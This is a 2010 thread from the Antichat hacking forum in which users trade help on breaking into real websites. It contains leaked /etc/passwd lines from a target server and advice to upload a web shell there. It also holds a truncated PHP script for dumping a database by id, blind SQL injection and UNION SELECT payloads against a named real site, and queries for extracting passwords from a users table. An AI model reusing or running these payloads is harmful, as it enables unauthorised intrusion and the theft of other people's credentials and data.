17.11.2010, 12:58
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
Сообщение от freezed
мне говорят, но я же сначала глянул на этот сайт, а ты просто сумничать решил, тут, видимо, как раз тот редкий случай, когда в пассвд есть путь, а в хттпд.конф нет:
Код:
flash.dvd-photo-slideshow.com:x:502:48:flash.dvd-photo-slideshow.com:/var/www/flash.dvd-photo-slideshow.com:/sbin/nologin
jp.flash-slideshow-maker.com:x:503:48::/var/www/jp.flash-slideshow-maker.com:/sbin/nologin
m4p-mp3.tuneclone.com:x:504:48::/var/www/m4p-mp3.tuneclone.com:/sbin/nologin
skyalbum.com:x:505:48::/var/www/skyalbum.com:/sbin/nologin
придержи-ка свой язык..ты шелл залей по этому пути, потом вякай..
|
|
|
17.11.2010, 13:01
|
|
Участник форума
Регистрация: 27.08.2010
Сообщений: 154
Провел на форуме:
31258
Репутация:
7
|
|
Сообщение от Gorev
придержи-ка свой язык..ты шелл залей по этому пути, потом вякай..
а при чем тут шелл? вопрос был в том, чтобы найти абсолютный путь, я подсказал, он указан в /etc/passwd, а папку с правами на запись уж пусть сам дальше ищет
что ж ты нервный-то такой
|
|
|
|
17.11.2010, 13:07
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме:
0
Репутация:
0
|
|
Сообщение от freezed
а при чем тут шелл? вопрос был в том, чтобы найти абсолютный путь, я подсказал, он указан в /etc/passwd, а папку с правами на запись уж пусть сам дальше ищет
что ж ты нервный-то такой
Не спорьте с Gorev. Он прав. И прекращайте флудить.
|
|
|
|
17.11.2010, 13:08
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
Сообщение от Фараон
Не спорьте с
Gorev
. Он прав.
Не всегда.
|
|
|
|
17.11.2010, 13:30
|
|
Участник форума
Регистрация: 15.08.2010
Сообщений: 260
Провел на форуме:
90728
Репутация:
62
|
|
Сообщение от pinch
посоветуйте программу или скрипт для слива бд. Чтоб прога сливала через where+id
http://site.ru/news.php?id=1+union+select+1,2,name,4+from+users+w here+id={index}--
а не через limit.
можно такой примитив заюзать например
[PHP]
[COLOR="#000000"] functionololo($url,$proxy='127.0.0.1')
{
$ch=curl_init($url);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_PROXY,$proxy);
$content=curl_exec($ch);
curl_close($ch);
return$content;
}
$num='1000';// максимальный id
$regex='~(.*?)~';//ну ты понел
$f=fopen('db','a+');
for($i=0;$i[COLOR="#007700"]
|
|
|
|
18.11.2010, 14:16
|
|
Новичок
Регистрация: 27.10.2010
Сообщений: 1
Провел на форуме:
283
Репутация:
0
|
|
http://www.bookmg.ru/news/post/id.15'
можно ли раскрутить?
|
|
|
|
18.11.2010, 15:33
|
|
Участник форума
Регистрация: 27.08.2010
Сообщений: 154
Провел на форуме:
31258
Репутация:
7
|
|
Сообщение от lostelacoste
http://www.bookmg.ru/news/post/id.15'
можно ли раскрутить?
как слепую точно можно:
true:
http://www.bookmg.ru/news/post/id.15+and+1=1
http://www.bookmg.ru/news/post/id.15+and+substring(@@version,1,1)='M'
http://www.bookmg.ru/news/post/id.15+and+(select+system_user)='sa'
false:
http://www.bookmg.ru/news/post/id.15+and+1=0
|
|
|
|
18.11.2010, 16:50
|
|
Новичок
Регистрация: 02.09.2010
Сообщений: 11
Провел на форуме:
2498
Репутация:
2
|
|
Мог бы кто не будь рассказать или дать ссылки на русское описание по использованию(или видео) JBroFuzz?
Был бы весьма признателен.
P.S.Видео от создателей видел(OWASP),но может есть от наших умельцев.
|
|
|
|
18.11.2010, 18:43
|
|
Познающий
Регистрация: 31.01.2007
Сообщений: 88
Провел на форуме:
631013
Репутация:
453
|
|
Код:
http://www.bookmg.ru/news/post/id.-15 union all select @@version,null,null,null,null--
|
|
|
|
18.11.2010, 19:15
|
|
Новичок
Регистрация: 20.04.2010
Сообщений: 1
Провел на форуме:
4855
Репутация:
0
|
|
используя такую конструкцию пытаюсь извлечь пассы
union select password,2,3,4,5,6,7,8,9,10 from users --
выводит 1 пасс
групконкат не работает
union select password,2,3,4,5,6,7,8,9,10 from users limit 1 --
выводит тот же пасс
union select password,2,3,4,5,6,7,8,9,10 from users limit 2 --
выводит тот же пасс
union select password,2,3,4,5,6,7,8,9,10 from users limit 1,0 --
union select password,2,3,4,5,6,7,8,9,10 from users limit 1,1 --
union select password,2,3,4,5,6,7,8,9,10 from users limit 2,1 --
ничего не выводит
почему так может происходить? Как правильно сделать запрос?
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
